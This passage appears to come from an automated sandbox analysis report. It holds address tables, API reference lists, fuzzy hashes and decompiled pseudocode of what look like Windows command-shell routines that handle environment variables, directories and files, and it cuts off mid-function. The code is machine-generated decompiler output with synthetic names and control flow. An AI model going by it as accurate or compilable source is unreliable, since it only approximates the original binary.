                                              0x002ad227
                                              0x002ad22c
                                              0x00000000
                                              0x00000000
                                              0x002ad232
                                              0x002ad234
                                              0x002ad239
                                              0x002ad23e
                                              0x002ad23f
                                              0x002ad242
                                              0x002ad243
                                              0x00000000
                                              0x002ad186
                                              0x002ad186
                                              0x002ad18a
                                              0x002ad18b
                                              0x002ad18c
                                              0x002ad18d
                                              0x002ad18e
                                              0x002ad18e
                                              0x002ad194
                                              0x002ad199
                                              0x002bb555
                                              0x002bb55b
                                              0x002bb563
                                              0x002bb565
                                              0x002bb565
                                              0x002bb56f
                                              0x002bb56f
                                              0x002ad1de
                                              0x00000000
                                              0x002ad1de
                                              0x002ad19f
                                              0x002ad1a2
                                              0x002ad1ab
                                              0x002ad1b0
                                              0x002ad254
                                              0x00000000
                                              0x00000000
                                              0x002ad25f
                                              0x002ad265
                                              0x002ad26b
                                              0x00000000
                                              0x00000000
                                              0x002ad273
                                              0x002ad27c
                                              0x002ad290
                                              0x002bb577
                                              0x002bb57d
                                              0x002bb584
                                              0x00000000
                                              0x00000000
                                              0x002bb58d
                                              0x002bb59c
                                              0x002bb58f
                                              0x002bb590
                                              0x002bb596
                                              0x00000000
                                              0x002bb58d
                                              0x002ad296
                                              0x002ad2ab
                                              0x002bb5a9
                                              0x002bb5b4
                                              0x002bb5b4
                                              0x002ad2b6
                                              0x002bb5c4
                                              0x002bb5cf
                                              0x002bb5cf
                                              0x002ad2b6
                                              0x002ad1b6
                                              0x002ad1b6
                                              0x002ad1b9
                                              0x002ad1c0
                                              0x002ad1c5
                                              0x002bb5da
                                              0x002bb5e2
                                              0x002bb5e8
                                              0x002ad1d2
                                              0x002ad1d5
                                              0x002ad1dc
                                              0x00000000
                                              0x002ad1dc
                                              0x002ad180
                                              0x00000000

                                              APIs
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 002AD18E
                                              • _open_osfhandle.MSVCRT ref: 002AD1A2
                                              • _wcsicmp.MSVCRT ref: 002AD1EF
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,002CF830,00002000), ref: 002AD221
                                              • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 002AD25F
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 002AD287
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 002AD2A3
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 002BB5B4
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 002BB5CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                              • String ID: con
                                              • API String ID: 686027947-4257191772
                                              • Opcode ID: 1ba738ae3bc5da3d63ad1df867a702ea89f97091520db9d93c7d40c61baad86f
                                              • Instruction ID: 7f20d5c29ed691aa0456dca5691bd31eef67af0d70e43c64f44619b49210125e
                                              • Opcode Fuzzy Hash: 1ba738ae3bc5da3d63ad1df867a702ea89f97091520db9d93c7d40c61baad86f
                                              • Instruction Fuzzy Hash: AE510A70A50205ABD720CF68EC8CFBE77B8EB46720F600215F926E72D0DBB09955C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ACEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E002ACEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E002B0C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E002B4B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E002ACFBC(L"PATH") == 0) {
						E002B3A50(L"PATH", 0x2a24ac);
					}
					if(E002ACFBC(L"PATHEXT") == 0) {
						E002B3A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E002ACFBC(L"PROMPT") == 0) {
						E002B3A50(L"PROMPT", L"$P$G");
					}
					if(E002ACFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E002AD7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E002B3A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E002B2349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E002B18C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E002ACFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x2e852c = 1;
							}
						}
						_t73 =  *0x2e3cb8;
						_t109 =  *0x2e3cb8;
						if( *0x2e3cb8 == 0) {
							_t73 = 0x2e3ab0;
						}
						_t53 = E002B33FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E002B6FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}




























                                              0x002aceb4
                                              0x002acebb
                                              0x002acecc
                                              0x002acece
                                              0x002aced4
                                              0x002aceda
                                              0x002acedd
                                              0x002acf03
                                              0x002bb419
                                              0x002bb41f
                                              0x002bb41f
                                              0x002bb424
                                              0x002bb42a
                                              0x002bb42a
                                              0x002acf14
                                              0x002acf19
                                              0x002acf2d
                                              0x002bb43c
                                              0x002bb43c
                                              0x002acf41
                                              0x002bb44d
                                              0x002bb44d
                                              0x002acf47
                                              0x002acf55
                                              0x002acfae
                                              0x002acfae
                                              0x002acf63
                                              0x002bb457
                                              0x002bb45a
                                              0x002bb45c
                                              0x002bb45e
                                              0x002bb45e
                                              0x002bb466
                                              0x002bb467
                                              0x002bb46c
                                              0x002bb46e
                                              0x002bb4e8
                                              0x002bb4e8
                                              0x002bb4eb
                                              0x002bb4ed
                                              0x002bb4ef
                                              0x002bb4ef
                                              0x002bb4fa
                                              0x00000000
                                              0x002bb470
                                              0x002bb475
                                              0x002bb47c
                                              0x002bb47f
                                              0x002bb481
                                              0x002bb483
                                              0x002bb485
                                              0x002bb485
                                              0x002bb48b
                                              0x002bb48e
                                              0x002bb48e
                                              0x002bb491
                                              0x002bb494
                                              0x002bb494
                                              0x002bb49b
                                              0x002bb49d
                                              0x002bb49f
                                              0x002bb4a1
                                              0x002bb4a3
                                              0x002bb4a9
                                              0x002bb4a9
                                              0x002bb4ad
                                              0x002bb4ae
                                              0x002bb4b3
                                              0x002bb4b9
                                              0x002bb4bb
                                              0x002bb4be
                                              0x002bb4d1
                                              0x002bb4d3
                                              0x002bb4d5
                                              0x002bb4d5
                                              0x002bb4db
                                              0x002bb4c0
                                              0x002bb4c0
                                              0x002bb4c2
                                              0x002bb4c4
                                              0x002bb4c4
                                              0x002bb4ca
                                              0x002bb4ca
                                              0x002bb4e3
                                              0x00000000
                                              0x002bb4e3
                                              0x002acf69
                                              0x002acf69
                                              0x002acf6e
                                              0x002acf75
                                              0x002bb50a
                                              0x002bb512
                                              0x002bb514
                                              0x002bb51a
                                              0x002bb51a
                                              0x002bb514
                                              0x002acf7b
                                              0x002acf81
                                              0x002acf83
                                              0x002acfb5
                                              0x002acfb5
                                              0x002acf87
                                              0x002acf8f
                                              0x002acfa6
                                              0x002acfa6
                                              0x002acf63
                                              0x002acf09
                                              0x002acf0e
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002ACEDD
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 002ACF19
                                                • Part of subcall function 002ACFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,002CF830,00002000,?,?,?,?,?,002B373A,002A590A,00000000), ref: 002ACFDF
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD005
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD01B
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD031
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD047
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD05D
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD073
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD085
                                                • Part of subcall function 002ACFBC: _wcsicmp.MSVCRT ref: 002AD09B
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002ACF8F
                                              • exit.MSVCRT ref: 002BB424
                                              • _wcsupr.MSVCRT ref: 002BB475
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                              • API String ID: 2336066422-4197029667
                                              • Opcode ID: f30437817a4454957870a6212533c090f32c765681d4f333bfeb66ea3df13c43
                                              • Instruction ID: fadb66919de926ea44aef539533c1133a1c9f6a9946c0e9cf5d08a0a0059471a
                                              • Opcode Fuzzy Hash: f30437817a4454957870a6212533c090f32c765681d4f333bfeb66ea3df13c43
                                              • Instruction Fuzzy Hash: 5B51E431A2021A9FDF14DB219CA56FEB775AF52380F1040AEE806D7682DF749E75CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B33FC, Relevance: 24.3, APIs: 16, Instructions: 307COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E002B33FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0x2cbdd8);
				E002B75CC(__ebx, __edi, __esi);
				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E002B0D51(_t177 - 0x244);
					if(E002B0C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E002B0DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E002ADF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E002B0DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0x2cd0b4);
									L002B82BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E002B0DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0x2cd0b4);
										L002B82BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E002B6CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0x2e3cc9 == 0) {
													L32:
													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E002B3A50(_t177 - 0x28, _t170) != 0) {
																E002B0DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x2cd0b4);
																L002B82BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0x2e3cb8;
																if( *0x2e3cb8 == 0) {
																	_t158 = 0x2e3ab0;
																}
																E002B36CB(_t135, _t158,  *0x2e3cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E002B0DE8(E002B36AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E002B0DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0x2cd0b4);
															L002B82BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E002B0DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x2cd0b4);
																L002B82BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E002B245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E002B7614(_t135, _t173, _t175);
			}



























                                              0x002b33fc
                                              0x002b33fc
                                              0x002b33fc
                                              0x002b3401
                                              0x002b3406
                                              0x002b340b
                                              0x002b3411
                                              0x002b3415
                                              0x002b3419
                                              0x002bdc11
                                              0x00000000
                                              0x002bdc17
                                              0x002bdc17
                                              0x002b341f
                                              0x002b341f
                                              0x002b3425
                                              0x002b344b
                                              0x002bdc21
                                              0x002bdc27
                                              0x00000000
                                              0x002b3451
                                              0x002b3458
                                              0x002b345a
                                              0x002b3462
                                              0x00000000
                                              0x002b3468
                                              0x002b346a
                                              0x002b346d
                                              0x002b346f
                                              0x002b346f
                                              0x002b3472
                                              0x002b3472
                                              0x002b3475
                                              0x002b3478
                                              0x002b3481
                                              0x002b3484
                                              0x002b3486
                                              0x002b3486
                                              0x002b348e
                                              0x00000000
                                              0x00000000
                                              0x002b3490
                                              0x002b3490
                                              0x002b3497
                                              0x002bdc76
                                              0x00000000
                                              0x002bdc76
                                              0x00000000
                                              0x002b3497
                                              0x002b349f
                                              0x002b34a2
                                              0x002b34a7
                                              0x002bdc7d
                                              0x002bdc7d
                                              0x002b34b1
                                              0x002b34b7
                                              0x002b34bc
                                              0x002bdc88
                                              0x002bdc88
                                              0x002b34cd
                                              0x002b34d2
                                              0x002b34d3
                                              0x002b34db
                                              0x002b34e4
                                              0x002b34e7
                                              0x002bdc93
                                              0x002b34f7
                                              0x002b3502
                                              0x002b3502
                                              0x002b3506
                                              0x002b350c
                                              0x002b3510
                                              0x002b3515
                                              0x002bdc9c
                                              0x002bdc9c
                                              0x002b3527
                                              0x002b352f
                                              0x002bdca7
                                              0x002bdcad
                                              0x00000000
                                              0x002b3535
                                              0x002b3538
                                              0x002bdcd9
                                              0x002bdcdf
                                              0x002bdce4
                                              0x002bdce9
                                              0x002bdcea
                                              0x002bdcef
                                              0x002b353e
                                              0x002b353e
                                              0x002b3543
                                              0x002b3545
                                              0x002bdd01
                                              0x002bdd01
                                              0x002b3550
                                              0x002bdc50
                                              0x002bdc56
                                              0x002bdc5b
                                              0x002bdc60
                                              0x002bdc61
                                              0x002bdc66
                                              0x002bdc6e
                                              0x00000000
                                              0x002b3556
                                              0x002b355a
                                              0x002bdd0c
                                              0x002bdd0c
                                              0x002b3564
                                              0x00000000
                                              0x002b356a
                                              0x002b356c
                                              0x002b356e
                                              0x002bdd17
                                              0x002bdd17
                                              0x002b3574
                                              0x002b3577
                                              0x002b3577
                                              0x002b357a
                                              0x002b357d
                                              0x002b3585
                                              0x002b3589
                                              0x002bdd22
                                              0x002bdd22
                                              0x002b358f
                                              0x002b3592
                                              0x002b3592
                                              0x002b3594
                                              0x002b35aa
                                              0x00000000
                                              0x00000000
                                              0x002b35ae
                                              0x002b35b3
                                              0x002b36a4
                                              0x00000000
                                              0x002b36a4
                                              0x00000000
                                              0x002b35b3
                                              0x002b35bb
                                              0x002b35be
                                              0x002b35c3
                                              0x002bdd2d
                                              0x002bdd2d
                                              0x002b35d3
                                              0x002bdd3e
                                              0x002bdd43
                                              0x00000000
                                              0x002bdd52
                                              0x002bdd55
                                              0x00000000
                                              0x002bdd5b
                                              0x00000000
                                              0x002bdd5b
                                              0x002bdd55
                                              0x002b35d9
                                              0x002b35d9
                                              0x002b35e0
                                              0x002b3600
                                              0x002b3600
                                              0x002b3609
                                              0x002b3631
                                              0x002b3633
                                              0x002b3640
                                              0x002b3645
                                              0x002b36b4
                                              0x002b36b4
                                              0x002b3650
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b3656
                                              0x002b3656
                                              0x002b3656
                                              0x002b365b
                                              0x002b36bc
                                              0x002b36bc
                                              0x002b3667
                                              0x002bdc34
                                              0x002bdc39
                                              0x002bdc3e
                                              0x002bdc3f
                                              0x002bdc44
                                              0x002bdc4c
                                              0x002bdc4c
                                              0x002bdc70
                                              0x002b366d
                                              0x002b366d
                                              0x002b3675
                                              0x002b36c4
                                              0x002b36c4
                                              0x002b3680
                                              0x002b3685
                                              0x002b3697
                                              0x002b369c
                                              0x002b3667
                                              0x002b360b
                                              0x002b360b
                                              0x002b3610
                                              0x002bdd6b
                                              0x002bdd6b
                                              0x002b3617
                                              0x002b3620
                                              0x002bdd76
                                              0x002bdd7c
                                              0x002bdd81
                                              0x002bdcb3
                                              0x002bdcb3
                                              0x002bdcb4
                                              0x002bdcba
                                              0x002bdcbf
                                              0x002bdcc4
                                              0x002bdcc5
                                              0x002bdcca
                                              0x002b3626
                                              0x002b362b
                                              0x002bdd92
                                              0x002bdd97
                                              0x002bdd9c
                                              0x002bdd9d
                                              0x002bdda2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b362b
                                              0x002b3620
                                              0x002b35e2
                                              0x002b35e2
                                              0x002b35e7
                                              0x002bdd60
                                              0x002bdd60
                                              0x002b35fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b35fa
                                              0x002b35e0
                                              0x002b35d3
                                              0x002b3564
                                              0x002b3550
                                              0x002b3538
                                              0x002b352f
                                              0x002b3462
                                              0x002b344b
                                              0x002b36a3

                                              APIs
                                                • Part of subcall function 002B0D51: memset.MSVCRT ref: 002B0D7D
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?,?,?,?,?), ref: 002B34B1
                                              • towupper.MSVCRT ref: 002B34C6
                                              • iswalpha.MSVCRT ref: 002B34DB
                                              • towupper.MSVCRT ref: 002B34FB
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 002B3527
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002B35CA
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002B3617
                                              • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 002B3648
                                              • _local_unwind4.MSVCRT ref: 002BDC44
                                              • _local_unwind4.MSVCRT ref: 002BDC66
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                              • String ID:
                                              • API String ID: 2497804757-0
                                              • Opcode ID: ef918e988848e971e46a525bf187fcb15a6d9f81d0e96c7ba33a67d1f74db87e
                                              • Instruction ID: 7536818de880aef159cab87c36cbe4cdd98acf2f776673410d99e1e66427054b
                                              • Opcode Fuzzy Hash: ef918e988848e971e46a525bf187fcb15a6d9f81d0e96c7ba33a67d1f74db87e
                                              • Instruction Fuzzy Hash: 13B1B231A201169ACB28EF64DD49BFDB374EF44380F54416AE41AE7290FB709FA4CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AEA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E002AEA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E002B00B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E002C9287(4);
						__imp__longjmp(0x2db8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E002B00B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E002C9287(_t139);
						__imp__longjmp(0x2db8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
